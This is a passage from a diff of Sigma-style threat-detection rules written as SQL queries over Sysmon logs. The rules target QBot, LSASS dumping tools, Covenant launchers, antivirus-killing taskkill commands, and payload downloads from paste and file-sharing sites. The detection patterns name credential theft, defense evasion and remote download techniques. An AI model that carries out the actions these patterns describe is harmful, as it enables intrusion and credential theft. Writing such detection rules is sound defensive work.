'%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_malware_qbot.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", - "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "status": "test", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1564.004" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", - "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "status": "test", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "title": "Suspicious CMD Shell Output Redirect", + "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1218" + ], + "falsepositives": [ + "Legitimate admin scripts" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + }, + { + "title": "CL_LoadAssembly.ps1 Proxy Execution", + "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "status": "experimental", + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" }, { - "title": "Suspicious X509Enrollment - Process Creation", - "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", + "title": "DumpMinitool Execution", + "id": "dee0a7a3-f200-4112-a99b-952196d81e42", "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", + "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND (CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_x509enrollment.yml" + "filename": "proc_creation_win_dumpminitool_execution.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "title": "Command Line Execution with Suspicious URL and AppData Strings", + "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", + "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.defense_evasion", + "attack.command_and_control", + "attack.t1059.003", "attack.t1059.001", - "attack.t1564.003" + "attack.t1105" + ], + "falsepositives": [ + "High" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_cmd_http_appdata.yml" + }, + { + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", + "tags": [ + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" + ], + "falsepositives": [ + "Software that uses the caret encased keywords PASS and USER in its command line" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Exotic software" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "title": "Suspicious Invoke-WebRequest Execution With DirectIP", + "id": "1edff897-9146-48d2-9066-52e8d8f80a2f", + "status": "experimental", + "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine 